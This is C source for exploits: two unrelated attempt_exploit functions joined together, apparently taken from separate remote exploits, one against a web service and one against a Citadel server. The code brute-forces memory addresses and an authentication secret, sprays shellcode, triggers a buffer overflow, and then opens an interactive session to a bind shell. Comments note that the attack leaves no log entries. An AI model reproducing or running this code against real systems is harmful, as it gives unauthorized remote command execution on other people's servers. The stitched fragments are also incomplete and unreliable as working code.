int attempt_exploit(void) { fd_set rfds; int sock,retVal,r; if(exactPointerAddy) { printf("[-] Using 0x%08x for pointer addy\n", exactPointerAddy); if((sock=connect_to_host(HTTP_PORT))<=0) return sock; magic_r=exactPointerAddy; make_exploitbuf(buf); my_send(sock, buf); my_recv(sock); close(sock); my_sleep(100000); if((sock=connect_to_host(SHELL_PORT))<=0) { return sock; } } else { // Do crappy bruteforce loop printf("[-] Attempting attack [ %s ] ...\n", targets[useTarget].platform); MAGIC_R_START=targets[useTarget].bruteStart; MAGIC_R_END=targets[useTarget].bruteEnd; retAddr=targets[useTarget].retAddr; for(magic_r=MAGIC_R_START; magic_r<=MAGIC_R_END; magic_r++) { printf("[-] Trying 0x%08x ... \r", magic_r);fflush(stdout); if((sock=connect_to_host(HTTP_PORT))<=0) return sock; make_exploitbuf(buf); my_send(sock, buf); my_recv(sock); close(sock); my_sleep(50000); if((sock=connect_to_host(SHELL_PORT))>=SUCCESS) { printf("\n[-] Found request_rec address @ 0x%08x\n", magic_r); break; } } if(magic_r>MAGIC_R_END) return BRUTE_FORCE_EXHAUSTED; } printf("[-] Connected to %s! You can type commands now:\n", host); // Now let the attacker issue commands to the remote // shell, just as if (s)he had launched 'nc host 45295'. do { FD_ZERO(&rfds); FD_SET(0, &rfds); FD_SET(sock, &rfds); retVal=select(sock+1, &rfds, NULL, NULL, NULL); if(retVal) { if(FD_ISSET(sock, &rfds)) { buf[(r=recv(sock, buf, SIZ-1,0))]='\0'; // bad! printf("%s", buf); } if(FD_ISSET(0, &rfds)) { buf[(r=read(0, buf, SIZ-1))]='\0'; // bad! send(sock, buf, strlen(buf), 0); } } } while(retVal && r); // loop until connection terminates close(sock); return SUCCESS; }
int attempt_exploit(void) { int magic; // Connect to the host and grab the banner printf("[-] Connecting to Citadel server (%s) on port %d\n", host, CITADEL_PORT); if((sock=connect_to_host(host,CITADEL_PORT)) < 1) return sock; my_recv(sock); // Attempt to brute-force the secret IPGM authentication number. // Only do this if magic number is not given on command-line (-i flag). magic=magicNumber; if(!magic) { printf("[-] Starting bruteforce operation ...\n");fflush(stdout); if((magic=brute_force(sock))==-1) { return BRUTE_FORCE_EXHAUSTED; } printf("[-] Success! IPGM=%d (seed: %d)\n", magic, seed); magicNumber=magic; // set magicNumber so we don't run bruteforcer again // Tear down the socket, and reconnect again (to reauthenticate), printf("[-] Re-establishing connection to %s ...\n",host); my_send(sock, "QUIT\n"); my_recv(sock); close(sock); if(!(sock=connect_to_host(host,CITADEL_PORT))) return sock; } // Authenticate as internal program, but unlike the brute-force attempts, // tag 4K of shellcode on the end of the request printf("[-] Authenticating as internal progam ...\n"); make_shellcode(buf); my_send(sock, "IPGM %d %s\n", magic, buf); LOCAL_NET(); buf[recv(sock,buf,SIZ-1,0)]=0; // don't do this at home, kids! if(strncmp(buf, "200",3)) { return INCORRECT_IPGM_SECRET; } // Increase the chance of the shellcode being in the correct place at the // correct time by sending it many times... this lets each worker thread // in Citserver copy the shellcode into a buffer, making it almost // certain that we can jump to it successfully (it hasn't failed once!) // Shellcode is stored in a buffer that is used by Citserver to hold // text that would normally get logged to stderr. As Citserver usually // runs as a daemon, this exploit doesn't show in any logs at all. increase_chances(sock,magic); // Enter configuration import mode, specifically the 'floor' section, // although I think others may be vulnerable too printf("[-] Entering config mode ...\n"); my_send(sock, "ARTV import\n"); my_recv(sock); my_send(sock, "floor\n"); // Start the vulnerable import process which blindly reads in 6 lines of // data. These lines are read into buffers 4K in size, and the data is // also truncated at 4K... Unfortunately, the 3rd line goes into a 256 // byte buffer which, of course, overflows.. printf("[-] Sending exploit strings ...\n"); my_send(sock, "a\n"); my_send(sock, "a\n"); // Overflow occurs when this buffer is read by the server, so make sure // it's padded to the correct size with the evil RET address tagged on // the end. make_exploitbuf(buf); my_send(sock,buf); // Send the final 3 lines of text. It can be anything we like... make_shellcode(buf); for(i=0;i<3;i++) my_send(sock,buf); // The server will now have RETurned to the new, malicious saved EIP and // is executing the shellcode... We close the connection, wait a couple of // seconds and then connect to the shell which is bound to port 45295. close(sock); printf("[-] Waiting before connecting to shell...\n"); sleep(2); printf("[-] Now connecting to shell...\n"); if(!(sock=connect_to_host(host,SHELL_PORT))) { return SHELL_NOT_FOUND; } printf("[-] Connected! You can type commands now:\n"); // Now let the attacker issue commands to the remote // shell, just as if (s)he had launched 'nc host 45295'. do { FD_ZERO(&rfds); FD_SET(0, &rfds); FD_SET(sock, &rfds); retVal=select(sock+1, &rfds, NULL, NULL, NULL); if(retVal) { if(FD_ISSET(sock, &rfds)) { buf[(r=recv(sock, buf, SIZ-1,0))]='\0'; // bad! printf("%s", buf); } if(FD_ISSET(0, &rfds)) { buf[(r=read(0, buf, SIZ-1))]='\0'; // bad! send(sock, buf, strlen(buf), 0); } } } while(retVal && r); // loop until connection terminates // Be an environmentally friendly programmer and free resources before exiting... close(sock); return 1; }